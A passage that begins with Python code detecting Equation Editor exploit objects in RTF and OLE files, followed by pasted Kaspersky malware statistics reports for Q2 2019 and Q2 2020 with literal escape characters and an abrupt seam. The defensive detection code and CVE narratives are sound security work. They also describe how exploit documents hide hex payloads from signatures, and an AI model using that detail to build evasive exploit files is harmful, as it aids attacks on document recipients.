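        yield data[start + len(marker):i]
        pos = i


def decode_objdata(group: bytes) -> bytes:
    """Hex-decode an \\objdata payload after removing the control words,
    nested-group braces and whitespace that obfuscated exploit RTFs
    interleave with the hex digits to break naive string signatures."""
    cleaned = _CONTROL_WORD.sub(b"", group)
    cleaned = _CONTROL_SYMBOL.sub(b"", cleaned)
    cleaned = _NON_HEX.sub(b"", cleaned)
    if len(cleaned) % 2:              # tolerate a dangling nibble
        cleaned = cleaned[:-1]
    return bytes.fromhex(cleaned.decode("ascii"))


def _scan_blob(blob: bytes, where: str):
    hits = []
    if EQUATION_CLSID_LE in blob:
        hits.append((where, str(EQUATION_CLSID)))
    for progid in EQUATION_PROGIDS:
        if progid in blob:
            hits.append((where, progid.decode("ascii")))
    return hits


def find_equation_objects(data: bytes):
    """Return (location, indicator) pairs for every Equation Editor
    reference found in an RTF document or a raw OLE2 (.doc) file."""
    findings = []
    if data.lstrip().startswith(b"{\\rtf"):
        for group in rtf_groups(data, b"\\objclass"):
            progid = group.strip()
            if progid.startswith(EQUATION_PROGIDS):
                findings.append(("objclass", progid.decode("ascii", "replace")))
        for group in rtf_groups(data, b"\\objdata"):
            findings.extend(_scan_blob(decode_objdata(group), "objdata"))
    else:
        findings.extend(_scan_blob(data, "raw"))
    return findings


# Constructed samples (not real malware). RTF_SAMPLE embeds an OLE1 object
# header whose class name is "Equation.3", with a \par control word and a
# line break injected into the hex stream the way obfuscated exploit
# documents do. OLE_SAMPLE is a compound-file signature followed by the
# Equation Editor CLSID. BENIGN_RTF has no embedded object at all.
RTF_SAMPLE = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000020000000b000000\\par 4571\n7561"
    b"74696f6e2e33" + b"00" * 9 + b"0c000000}}}"
)
OLE_SAMPLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16 + EQUATION_CLSID_LE + b"\x00" * 8
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly numbers only.\\par}"

if __name__ == "__main__":
    for name, sample in (("RTF_SAMPLE", RTF_SAMPLE), ("OLE_SAMPLE", OLE_SAMPLE), ("BENIGN_RTF", BENIGN_RTF)):
        print(name, find_equation_objects(sample))
```

This is a first-pass heuristic, not a complete detector: it confirms that a document references the vulnerable component, which is enough to pull it out of a mail queue for sandboxing, but a document that reaches EQNEDT32.EXE through a different class identifier or a multi-stage loader would need a deeper parser (or dynamic analysis) to catch.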
These exploits are more likely to succeed: the document formats allow a range of tricks for evading static detection, and execution is invisible to the user and needs no extra action, such as enabling macros.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)\n\nThe share of detected exploits for vulnerabilities in web browsers in Q2 amounted to 14%, about a fifth of the share of exploits for Microsoft Office. Most browser vulnerabilities arise in just-in-time compilation and in the optimization passes that follow it, since the logic there is complex and demands special attention from developers. A typical bug is a missing check for a change to data or to a data type that the compiler/optimizer did not anticipate, which lets optimized code run on assumptions that no longer hold. Other common bug classes leading to remote code execution in browsers are integer overflows, use-after-free, and type confusion. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it chained two Mozilla Firefox vulnerabilities: [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), a type confusion in the JavaScript engine that gave code execution in the content process, and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), a sandbox escape.\n\nOn the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. 
The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).\n\nThe share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were quick to weaponize new vulnerabilities in network-facing applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>). Brute-force password attacks on Remote Desktop Protocol and Microsoft SQL Server also continued. However, the greatest danger for many users came from [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) (BlueKeep), disclosed in Q2, in Remote Desktop Services on Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control of vulnerable computers and to build a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient validation of incoming packets lets an attacker trigger a use-after-free in the kernel-mode RDP driver and overwrite kernel memory. 
Note that exploitation requires no valid account: the bug is triggered during connection setup, before the username and password are checked, so it is exploitable pre-authentication.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n#### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are resolved to their current IP addresses, and the geographical location of each IP address is then looked up (GeoIP)._\n\nIn Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US. 
Overall, the Top 4 remained unchanged from the previous quarter.\n\n#### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 20.38 \n2 | Venezuela | 19.13 \n3 | Albania | 18.30 \n4 | Greece | 17.36 \n5 | Moldova | 17.30 \n6 | Bangladesh | 16.82 \n7 | Estonia | 16.68 \n8 | Azerbaijan | 16.59 \n9 | Belarus | 16.46 \n10 | Ukraine | 16.18 \n11 | France | 15.84 \n12 | Philippines | 15.46 \n13 | Armenia | 15.40 \n14 | Tunisia | 15.29 \n15 | Bulgaria | 14.73 \n16 | Poland | 14.69 \n17 | Réunion | 14.68 \n18 | Latvia | 14.65 \n19 | Peru | 14.50 \n20 | Qatar | 14.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.\n\n_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)\n\n### Local threats\n\n_Statistics on local 
infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.\n\n#### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 55.43 \n2 | Tajikistan | 55.27 \n3 | Uzbekistan | 55.03 \n4 | Yemen | 52.12 \n5 | Turkmenistan | 50.75 \n6 | Laos | 46.12 \n7 | Syria | 46.00 \n8 | Myanmar | 45.61 \n9 | Mongolia | 45.59 \n10 | Ethiopia | 44.95 \n11 | Bangladesh | 44.11 \n12 | Iraq | 43.79 \n13 | China | 43.60 \n14 | Bolivia | 43.47 \n15 | Vietnam | 43.22 \n16 | Venezuela | 42.71 \n17 | Algeria | 42.33 \n18 | Cuba | 42.31 \n19 | Mozambique | 42.14 \n20 | Rwanda | 42.02 \n \n_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. 
The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)\n\nOverall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.\n\nThe figure for Russia was 26.14%.\n\n_Source: Securelist, "IT threat evolution Q2 2019. Statistics", published 2019-08-19, <https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/>_\n\n_IT threat evolution Q2 2020. Statistics (Securelist)_\n\n**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>) \n[IT threat evolution Q2 2020. 
Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2:\n\n * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.\n * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.\n * Ransomware attacks were defeated on the computers of 154,720 unique users.\n * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.\n\n_Number of unique users attacked by financial malware, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Geography of attacks**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 7.5 \n2 | Uzbekistan | 5.7 \n3 | Tajikistan | 5.6 \n4 | Afghanistan | 2.6 \n5 | Macedonia | 2.6 \n6 | Yemen | 2.2 \n7 
| Syria | 1.9 \n8 | Kazakhstan | 1.7 \n9 | Cyprus | 1.7 \n10 | Iran | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._\n\nAmong the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet's activity fell at the end of Q1 2020, but the effect only became visible in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 24.8 | \n2 | RTM | Trojan-Banker.Win32.RTM | 18.6 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.4 | \n4 | Emotet | Backdoor.Win32.Emotet | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 4.7 | \n6 | Nimnul | Virus.Win32.Nimnul | 4.3 | \n7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 | \n9 | Nymaim | Trojan.Win32.Nymaim | 2.5 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.4 | \n \n_* Unique users attacked by this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trend highlights\n\nThe attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims regain access to their data.\n\nRansomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. 
Whether this reflects an interest in new technology, ease of development, or an attempt to make researchers' work harder is not known for sure.\n\n### Number of new modifications\n\nWe detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.\n\n_Number of new ransomware modifications detected, Q2 2019 – Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nKaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.69% \n2 | Mozambique | 1.16% \n3 | Uzbekistan | 1.14% \n4 | Egypt | 0.97% \n5 | Ethiopia | 0.94% \n6 | China | 0.74% \n7 | Afghanistan | 0.67% \n8 | Pakistan | 0.57% \n9 | Vietnam | 0.55% \n10 | Mongolia | 0.49% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). 
\n** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% | \n3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% | \n5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% | \n6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% | \n8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% | \n9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% | \n10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nKaspersky solutions detected 3,672 new miner modifications in Q2 2020, several dozen times fewer than in the previous quarter.\n\n_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_\n\nThe difference is explained by the thousands of modifications of a single miner family that were detected in the first quarter. In the quarter under review, that miner's activity dwindled, which is reflected in the statistics.\n\n### Number of users attacked by miners\n\nWe detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. 
This type of threat shows a clear downward trend.\n\n_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.08% \n2 | Ethiopia | 4.04% \n3 | Uzbekistan | 2.68% \n4 | Tanzania | 2.57% \n5 | Vietnam | 2.17% \n6 | Rwanda | 2.11% \n7 | Kazakhstan | 2.08% \n8 | Sri Lanka | 1.97% \n9 | Mozambique | 1.78% \n10 | Belarus | 1.41% \n \n_* Excluded are countries with relatively few Kaspersky product users (under 50,000). \n** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nExploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This vulnerability is a stack overflow in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. 
The remaining positions on the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>).\n\nThe second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, a number of vulnerabilities that could have been turned into exploits were found by researchers in time and reported to the vendors, who released fixes.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_\n\nThe first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned the identifiers [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>). Both were fixed, and neither is known to have been exploited in the wild. 
Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>). It allows remote code execution due to incorrect processing of Cabinet files, for example, if the user is tricked into running a malicious CAB file posing as a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed an attacker to execute arbitrary code with the user's privileges by means of a specially crafted LNK file.\n\nThe trend of brute-forcing Remote Desktop Services, Microsoft SQL Server and SMB passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting were [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) in SMBv1, which allowed an attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost), an SMBv3 vulnerability popular among researchers, received an unexpected follow-up in the form of an exploit that compromises the system without any user interaction. The same protocol version was found to contain a bug designated [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as SMBleed, an information leak that returns a portion of Windows kernel memory to the attacker. Researchers even published several exploit versions that chain SMBleed with SMBGhost to execute code with SYSTEM privileges. 
With SYSTEM privileges, the attacker can install any software and read any data on the computer.\n\n## Attacks on Apple macOS\n\nIn Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means of creating malware for the macOS platform. Compared with a backdoor written in Objective-C, the difference in size is striking: a Lador binary is 5.5 megabytes, many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.\n\n**Top 20 threats for macOS**\n\n| Verdict | %* \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 17.39 \n2 | Trojan-Downloader.OSX.Shlayer.a | 12.07 \n3 | AdWare.OSX.Pirrit.j | 9.10 \n4 | AdWare.OSX.Bnodlero.at | 8.21 \n5 | AdWare.OSX.Cimpli.k | 7.32 \n6 | AdWare.OSX.Pirrit.o | 5.57 \n7 | Trojan-Downloader.OSX.Agent.h | 4.19 \n8 | AdWare.OSX.Ketin.h | 4.03 \n9 | AdWare.OSX.Pirrit.x | 4.00 \n10 | AdWare.OSX.Spc.a | 3.98 \n11 | AdWare.OSX.Amc.c | 3.97 \n12 | Backdoor.OSX.Lador.a | 3.91 \n13 | AdWare.OSX.Pirrit.v | 3.22 \n14 | RiskTool.OSX.Spigot.a | 2.89 \n15 | AdWare.OSX.Bnodlero.t | 2.87 \n16 | AdWare.OSX.Cimpli.f | 2.85 \n17 | AdWare.OSX.Adload.g | 2.60 \n18 | AdWare.OSX.Pirrit.aa | 2.54 \n19 | AdWare.OSX.MacSearch.d | 2.44 \n20 | AdWare.OSX.Adload.h | 2.35 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nThe rankings of the most common threats for the macOS platform have not changed much compared to the previous quarter and are still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. 
That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.\n\nThe Lador.a backdoor, which we mentioned above, entered the rankings along with adware.\n\nFinally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user's browsing history to the developer's servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and servers that could receive the data, disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.\n\n### Threat geography\n\n_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 9.82% \n2 | France | 7.73% \n3 | Mexico | 6.70% \n4 | Italy | 6.54% \n5 | India | 6.47% \n6 | Canada | 6.34% \n7 | Brazil | 6.25% \n8 | USA | 5.99% \n9 | United Kingdom | 5.90% \n10 | Russia | 5.77% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for MacOS (under 5,000). 
\n** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for MacOS in the same country._\n\nThe most common threats in all the countries on the list, without exception, bundled various adware with the Shlayer Trojan.\n\n## IoT attacks\n\n### IoT threat statistics\n\nQ2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.\n\nTelnet | 80.83% \n---|--- \nSSH | 19.17% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_\n\nSubsequent sessions with our traps (devices that presented themselves as infected but were in fact honeypots) were also conducted far more often over Telnet.\n\nTelnet | 71.52% \n---|--- \nSSH | 28.48% \n \n_Distribution of cybercriminals' working sessions with Kaspersky traps, Q2 2020_\n\n_Geography of IP addresses of devices from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 12.75% \nBrazil | 11.88% \nEgypt | 8.32% \nTaiwan | 6.58% \nIran | 5.17% \nIndia | 4.84% \nRussia | 4.76% \nVietnam | 3.59% \nGreece | 3.22% \nUSA | 2.94% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of attacking devices_\n\nThe three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. 
China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.

_Geography of IP addresses of devices from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**

**Country** | **%***
---|---
China | 22.12%
USA | 10.91%
Vietnam | 8.20%
Brazil | 5.34%
Germany | 4.68%
Russia | 4.44%
France | 3.42%
India | 3.01%
Egypt | 2.77%
Singapore | 2.59%

_* Share of devices from which attacks were carried out in the country out of the total number of devices_

As with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).

### Threats loaded into traps

**Verdict** | **%***
---|---
Trojan-Downloader.Linux.NyaDrop.b | 32.78
Backdoor.Linux.Mirai.b | 17.47
HEUR:Backdoor.Linux.Mirai.b | 12.72
HEUR:Backdoor.Linux.Gafgyt.a | 9.76
Backdoor.Linux.Mirai.ba | 7.99
HEUR:Backdoor.Linux.Mirai.ba | 4.49
Backdoor.Linux.Gafgyt.bj | 2.23
HEUR:Trojan-Downloader.Shell.Agent.p | 1.66
Backdoor.Linux.Mirai.cn | 1.26
HEUR:Backdoor.Linux.Mirai.c | 0.73

_* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._

As in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: TOP 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.

_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the **_Malware class_**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| Country* | % of attacked users**
---|---|---
1 | Algeria | 11.2052
2 | Mongolia | 11.0337
3 | Albania | 9.8699
4 | France | 9.8668
5 | Tunisia | 9.6513
6 | Bulgaria | 9.5252
7 | Libya | 8.5995
8 | Morocco | 8.4784
9 | Greece | 8.3735
10 | Vietnam | 8.2298
11 | Somalia | 8.0938
12 | Georgia | 7.9888
13 | Malaysia | 7.9866
14 | Latvia | 7.8978
15 | UAE | 7.8675
16 | Qatar | 7.6820
17 | Angola | 7.5147
18 | Réunion | 7.4958
19 | Laos | 7.4757
20 | Mozambique | 7.4702

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._

